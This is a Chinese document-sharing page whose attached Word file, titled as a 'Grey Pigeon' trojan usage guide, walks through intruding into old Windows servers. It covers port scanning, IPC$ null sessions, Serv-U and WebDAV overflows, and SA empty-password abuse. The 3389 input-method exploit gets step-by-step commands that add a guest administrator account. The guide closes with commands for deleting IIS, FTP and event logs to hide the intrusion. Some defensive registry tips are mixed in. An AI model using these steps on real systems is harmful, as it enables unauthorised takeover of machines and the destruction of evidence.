灰鸽子使用方法Word格式.docx
- 文档编号:16156261
- 上传时间:2022-11-21
- 格式:DOCX
- 页数:14
- 大小:25.69KB
灰鸽子使用方法Word格式.docx
《灰鸽子使用方法Word格式.docx》由会员分享,可在线阅读,更多相关《灰鸽子使用方法Word格式.docx(14页珍藏版)》请在冰豆网上搜索。
第五步:
窃取网络资源和特权
攻击者找到攻击目标后,会继续下一步的攻击。
如:
下载敏感信息;
窃取帐号密码、个人资料等。
三、网络攻击的原理和手法
1、从扫描开始
扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。
常见的扫描工具有X-scan、superscan、流光、X-port等。
在这些工具中,国产的X-scan与流光可算的上是两个“利器”,这两个工具不但具有相当快的扫描速度和精确度(个人感觉X-scan在扫描速度上可能更快一点),同时还是发起攻击的第一手选择,当然在攻击方面,流光更为强悍些。
除了常见个WWW(80)、FTP(21)、TELNET(23)等,查查十大高风险事件,我们就知道,攻击者通常还对下列端口很感兴趣:
135:
MSRPC,可以产生针对Windows2000/XPRPC服务远程拒绝服务攻击,以及RPC溢出漏洞,著名的“冲击波”“震荡波”就是利用DCOMRPC感染设备;
137~139:
NetBIOS,WINDOWS系统通过这个端口提供文件和打印共享;
445:
Microsoft-ds,非常重要的端口,LSASS漏洞、RPC定位漏洞都在这里出现;
1433:
MicrosoftSQL,后面会提到,SQLSERVER默认安装时留下的空口令SA用户可以让攻击者为所欲为;
5632:
PCANYWERE,一种远程终端控制软件;
3389:
WINDOWS远程终端服务
4899:
RADMIN,一种远程终端控制软件
由此可见,没有扫描,自然也就没有攻击,从安全的角度的来说,个人主机最安全的系统应该算是WINDOWS98,由于WINDOWS98几乎不开启任何服务,自然也没有任何开放端口,没有端口,对于这类系统攻击的可能性就大大降低。
当然,XP在打了SP2的补丁后,等于有了一个基于状态的个人防火墙,相对安全性也提高了很多。
2、攻击开始
扫描到有开放的端口,下一步自然是针对相关端口发起攻击,针对不同端口常见攻击方式有:
139/445:
“永恒”的IPC$(未发现此漏洞)
说是“永恒”,主要是因为这种漏洞基本已经只能存在于记忆中了。
什么是IPC,IPC是共享“命名管道”的资源,主要用于程序间的通讯。
在远程管理计算机和查看计算机的共享资源时使用。
什么是“空连接”,利用默认的IPC我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的用户列表。
得到用户列表有什么用?
我们可以利用IPC,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测。
得到了用户权限后,我们可以利用IPC共享访问用户的资源。
但所谓的ipc漏洞ipc漏洞,其实并不是真正意义上的漏洞,WINDOWS设计初衷是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c,d,e……)和系统目录winnt或windows(admin)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,曾经在一段时间,IPC$已经成为了一种最流行的入侵方式。
IPC$需要在NT/2000/XP下运行,通常如果扫描出目标开放了139或445端口,往往是目标开启IPC$的前兆,但如果目的主机关闭了IPC$连接共享,你依然无法建立连接,同样如果管理员设置禁止导出用户列表,你就算建立IPC$连接也无法看到对方的用户列表。
另外提醒一下,WINXP系统中,已经禁止了远程用户的访问权限,因此,如果对方是XP的操作系统,就别费这个劲了。
如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous=DWORD的键值改为:
00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入netshare
2)删除共享(每次输入一个)
netshareipc$/delete
netshareadmin$/delete
netsharec$/delete
netshared$/delete(如果有e,f,……可以继续删除)
3)停止server服务
netstopserver/y(重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:
找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:
00000000。
pro版:
找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:
lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等)
5设置复杂密码,防止通过ipc$穷举密码
除了IPC$,我们还可以利用例如SMBCRACK通过暴力猜解管理员口令,如果对方未打补丁,我们还可以利用各种RPC漏洞(就是冲击波、震荡波用的那些漏洞),通过各种溢出程序,来得到权限提升(原理和病毒感染的原理是一样的)。
21:
Serv-u入侵(未测试使用)
Serv-u是常用的FTPSERVER端软件的一种,因为常用,所以被研究出的漏洞也不少,如果对端开放了21端口,并且采用Seru-U来架站的话,可以查看一下对端的版本。
对5.004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,有一个本地提升权限的漏洞。
(servlocal.exe)
Serv-UFTPServe在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。
包括用户的权限信息和可访问目录信息。
本地受限用户或者是远程攻击者只要能够读写Serv-UFTPServe的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。
80:
曾经的神话“WEBDAV”(使用情况,成功溢出4台主机,并登陆其中一台,其他3台的IIS重启)
微软的IIS功能强大,但遗憾的是同样漏洞多多,如果IIS不打补丁到SP3的话,那么就有一个著名的WEBDAV漏洞。
Webdav漏洞说明:
MicrosoftWindows2000支持“万维网分布式创作和版本控制(WebDAV)”协议。
RFC2518中定义的WebDAV是超文本传输协议(HTTP)的一组扩展,为Internet上计算aIIS服务(默认情况下在LocalSystem上下文中运行)的安全上下文中运行。
尽管Microsoft已为此弱点提供了修补程序并建议客户立即安装该修补程序,但还是提供了其他的工具和预防措施,客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利用。
可以使用扫描器:
Webdavscan(是一个专门用于检测IIS5.0服务器是否提供了对WebDAV的支持的扫描器)来查找网络中存在WEBDAV漏洞的主机,并用溢出程序:
wdx.exe来进行攻击当溢出成功后,就可以使用telnet或者是nc等连接到目标主机的7788端口。
如:
telnet127.0.0.17788
如果正常的话,将出现以下提示:
MicrosoftWindows2000[Version5.00.2195](C)版权所有1985-2000MicrosoftCorp.C:
\WINNT\system32>
OK!
如何防御:
1.搜索注册表中的如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
增加如下注册表键值:
valuename:
DisableWebDAV
Datatype:
DWORD
valuedata:
1
2.使用MS提供的专用补丁!
MicrosoftSQL的SA空口令(扫描到4台,成功登陆其中3台)
微软的MSSQL7.0以下的版本在默认安装时其SA(SystemAdministrator)口令为空,所开端口为1433,这个漏洞很早了,但直到现在我们依然可以扫描到很多空口令的SA。
更为“搞笑”的是,微软为了能够让SQL管理员管理方便,还设计了一个xp_cmdshell来执行各种相关命令。
一个入侵者只需要使用一个MSSQL客户端与SA口令为空的服务器连接就可以获得System的权限,并可以在目标主机上执行任意命令。
攻击方式,利用“流光”或其他扫描工具可以扫描、破解SA口令,破解成功后可以使用SQL客户端(如SQLEXEC)连接,并获得系统权限。
解决办法:
更改SA管理用户口令;
删除XP_CMDSHELL命令。
(但并不保险,因为如果拥有SA权限,还是可能恢复该命令的)
3389输入法漏洞(不太可能存在了,但可以猜解管理员用户口令)
MicrosoftWindows2000Server及以上版本在安装服务器时,其中有一项是超级终端服务,该服务可以使用户通过图形界面象管理本地计算机一样控制远程计算机(因此成为众多攻击者的最爱)。
该服务所开放的端口号为3389,是微软为了方便用户远程管理而设。
但是中文Windows2000存在有输入漏洞,其漏洞就是用户在登录Windows2000时,利用输入法的帮助文件可以获得Administrators组权限。
1、用终端客户端程序进行连接;
2、按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
3、在\"
选项\"
菜单上点右键--->
跳转到URL\"
,输入:
c:
\\winnt\\system32\\cmd.exe.(如果不能确定NT系统目录,则输入:
\\或d:
\\……进行查找确定);
4、选择\"
保存到磁盘\"
选择目录:
\\inetpub\\s\\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
5、打开IE,输入:
http:
//ip/s/cmd.exe?
/cdir怎么样?
有cmd.exe文件了吧?
这我们就完成了第一步;
6、http:
/cechonetuserguest/active:
yes>
go.bat
7、http:
/cechonetuserguestelise>
>
8、http:
/cechonetlocalgroupadministrators/add
guest>
9、http:
/ctypego.bat看看我们的批文件内容是否如下:
netuserguest/active:
yes
netuserguestelise
netlocalgroupadministrators/addguest
10、在\"
\\inetpub\\s\\go.bat--->
在磁盘当前位置执行;
11、OK,.这样我们就激活了服务器的geust帐户,密码为:
elise,超级用户!
注意事项:
当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:
(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧:
-)
这个漏洞在WIN2000SP1中已经修改,因此,实际网络中存在此漏洞的机器几乎没有,但是,据说紫光2.3版本、超级五笔的输入法中又发现此漏洞。
解决方法
1.打补丁;
2.删掉相关输入法,用标准就可以;
3.服务中关掉:
TerminalServices,服务名称:
TermService,对应程序名:
system32\\termsrv.exe;
如果对方已经修改了输入法漏洞,那么只能通过猜解目标管理员口令的方法来尝试远程登陆。
5632/4899:
PCANYWERE和RADMIN
这是两种远程控制软件,使用方式与远程终端访问类似,都支持图形化界面对远程计算机进行管理,设计的初衷是为了让管理员能够更方便的管理设备,但这些软件,特别是RADMIN,可以设置其在安装时,不出现任何提示,这种方式使RADMIN更多的被做为一种木马使用。
攻击者会注意扫描这些端口,因为一旦破解了相应口令就可以象操作本地计算机一样控制目标。
23:
猜解ADSLMODEM口令
很多时候,扫描只能得到一个23端口,不要沮丧,因为对于个人主机而言,这往往是因为目标主机采用了一个ADSLMODEM上网。
一般用户在使用ADSLMODEM时,往往未加设置,这时,攻击者往往可以利用ADSLMODEM的默认口令,登陆ADSL,一旦登陆成功,就有可能窃取ADSL帐户和口令,并可以查看到内网的IP地址设置,并通过配置NAT映射将内网PC的相关端口映射到公网上,然后对其进行各种破解、攻击。
特洛伊木马
扫描端口、通过各种方法获得目标主机的用户权限之后,攻击者往往利用得到的权限上传执行一个“木马”程序,以便能够更方便的控制目标主机。
特洛伊木马是一种或是直接由一个黑客,或是通过一个不令人起疑的用户秘密安装到目标系统的程序。
一旦安装成功并取得管理员权限,安装此程序的人就可以直接远程控制目标系统。
实际上,对于各种个人主机,在未开放端口和打全补丁后,最有效的攻击方式还是“木马”程序。
攻击者往往利用捆绑方式将木马程序与一个普通的EXE文件、JPG或其他正常文件绑定在一起,并利用“社会工程学”的方式,欺骗对方执行程序、查看图片等。
在对方执行程序、打开图片后,木马程序就悄无声息在用户的PC上执行,并将用户的一些相关信息通过EMAIL或其他方式发送给攻击者,而攻击者则可以通过木马程序实施对用户电脑的控制,比如控制文件、注册表、键盘记录甚至控制屏幕等。
在早期,木马程序程序隐藏的并不深,通过查看任务管理器就会发现系统内存在不明程序在运行,并且木马程序还会在用户主机上监听特定端口(如冰河的7626),等待攻击者的连接。
典型的早期木马如BO、BO2000、SUBSERVEN、国产的经典木马“冰河”等……这种方式的木马容易被发现,而且被攻击目标也必须连接在公网上,因为客户端是无法透过NAT、防火墙连接到内网的用户的。
反弹端口类型木马,“广外女生”木马是国内出现最早反弹端口类型的木马,这个木马与传统的木马不同,它在执行后会主动连接外网的攻击者的相关端口,这种方法就避免了传统木马无法控制内部用户的弊端(因为防火墙一般不会对内部发出的数据做控制)。
此外,“广外女生”还会自动杀掉相关杀毒程序的进程。
传统木马在执行后会作为一个进程,用户可以通过杀掉进程的方法关闭,而现在的木马则会将自己注册一个系统服务,在系统启动后自动运行。
甚至会通过DLL注入,将自己隐藏在系统服务身后。
这样用户查看进程的时候既看不到可疑进程,也看不到特殊服务……典型代表“灰鸽子”“武汉男生”。
ASP木马,典型代表“海阳顶端网木马”。
随着ASP技术的发展,网络上基于ASP技术开发的网站越来越多,对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。
但是基于ASP技术的木马后门,也越来越多,而且功能也越来越强大。
ASP程序本身是很多网站提供一些互动和数据处理的程序,ASP木马则是利用ASP语言编制的脚本嵌入在网页上,当用户浏览这些网页时会自动执行相关ASP脚本,被木马感染,这种方式更加简单和隐蔽,需要注意的是,ASP木马往往是依靠IE浏览器的一些漏洞来执行的,因此给IE打补丁是防范ASP木马的方法之一(当然并非万能,还有一些木马会利用IE的未知漏洞传播)。
清除日志
攻击者在取得用户权限后,为了避免被发现,就要考虑清除用户主机的相关日志,因为日志系统往往会记录攻击者的相关攻击过程和信息。
Windows2000的日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所
开启的服务不同。
一般步骤如下:
1.清除IIS的日志。
可不要小看IIS的日志功能,它可以详细的记录下你的入侵全过程,如你用unicode入侵时ie里打的命令,和对80端口扫描时留下的痕迹。
1.日志的默认位置:
%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志。
那我们就切换到这个目录下吧,然后del*.*。
但由于w3svc服务还开着,日志依然还在。
方法一:
如有3389可以登录,那就用notepad打开,按Ctrl+A然后del吧。
方法二:
net命令
C:
\>
netstopw3svc
WorldWideWebPublishingService服务正在停止。
(可能会等很长的时间,也可能不成功)
WorldWideWebPublishingService服务已成功停止。
选择先让w3svc停止,再清除日志,不要忘了再重新打开w3svc服务。
netstartw3svc
2.清除ftp日志
FTP日志默认位置:
%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个日志,清除方法同上。
3.清除Scheduler日志
Scheduler服务日志默认位置:
%systemroot%\schedlgu.txt。
清除方法同上。
4.应用程序日志、安全日志、系统日志、DNS日志默认位置:
%systemroot%\system32\config。
注意以上三个目录可能不在上面的位置,那是因为管理员做了修改。
可以读取注册表值得到他们的位置:
应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
Schedluler服务日志在注册表中的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
5.清除安全日志和系统日志了,守护这些日志的服务是EventLog,试着停掉它!
D:
\SERV
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 灰鸽子 使用方法